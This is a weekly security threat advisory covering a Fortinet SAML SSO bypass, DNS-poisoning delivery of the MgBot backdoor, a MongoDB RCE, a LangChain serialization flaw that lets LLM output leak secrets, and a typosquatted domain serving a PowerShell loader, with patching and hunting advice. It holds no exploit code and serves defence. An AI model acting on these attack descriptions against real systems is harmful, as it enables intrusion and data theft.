SSO Bypass, DNS Poisoning, MongoDB RCE & Typosquat PowerShell Loader

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. SSO trust broken: Fortinet SAML bypass goes live

Attackers are abusing FortiCloud SSO paths to jump straight into admin panels via crafted SAML, then pulling configs for follow-on abuse. Treat perimeter gear as compromised until patched and SSO is locked down.

• Fortinet FortiGate SSO auth bypass (CVE-2025-59718/59719) — Pre-auth SAML tricks grant admin access; rapid weaponization seen, configs exfil’d post-login. Patch to fixed builds and disable FortiCloud SSO until done.

2. Infrastructure-in-the-middle: DNS poisoning delivers stealthy implants

Operation-grade actors are poisoning DNS and hijacking “trusted” update flows to slip loaders that decrypt per-victim payloads, then live inside legit processes for long-term espionage.

• Evasive Panda → MgBot — DNS/AitM reroutes software updates to attacker infra; multi-stage loaders drop a modular MgBot backdoor with file/keylogging/credential theft via svchost injection.

3. Core stack cracks: data layer and AI framework exploitation

Two pillars of modern apps—datastores and LLM frameworks—show how a single bug can turn into secret theft, remote code execution, and broken trust boundaries if serialization and compression paths aren’t nailed shut.

• MongoDB RCE (CVE-2025-14847) — zlib length handling flaw enables unauthenticated RCE on vulnerable MongoDB servers; urgent upgrades required across 8.x→4.4 lines.

• LangChain Core serialization injection (CVE-2025-68664) — Unescaped lc keys let attacker-controlled LLM outputs instantiate objects, leak env secrets, and subvert chains; upgrade and treat LLM output as untrusted data.

4. Typosquat trap: fake activators push PowerShell loaders

A look-alike domain for Microsoft Activation Scripts turns a single mistyped URL into a PowerShell-delivered loader that pivots to miners and RATs—proof that “quick fixes” can become quick compromises.

• Cosmali Loader via MAS typosquat — Users hitting get.activate[.]win pull a PS script that installs Cosmali, leading to crypto mining/XWorm and scare-popup shakedowns.

Proactive Steps for the Week

• Perimeter hardening: Patch Fortinet devices to the fixed releases; disable FortiCloud SSO until verified; restrict management to allow-listed IPs.

• DNS integrity: Enforce resolver controls/DNSSEC where feasible; alert on update domains resolving to new or rare IPs; validate update signatures/pins.

• Data & AI stack fixes: Upgrade MongoDB to 8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30; upgrade LangChain(Core) to patched versions and enable allowed_objects allowlists; block Jinja2 with untrusted data.

• Script abuse controls: Block untrusted PS execution; EDR rules for encoded PS + LOLBIN chains; user banner to avoid unofficial activators and typosquatted sites.

• Threat hunting: Look for Fortinet SSO admin logins from hosting ASN IPs, svchost injection consistent with MgBot, unexpected MongoDB external access, and LangChain pipelines serializing LLM metadata.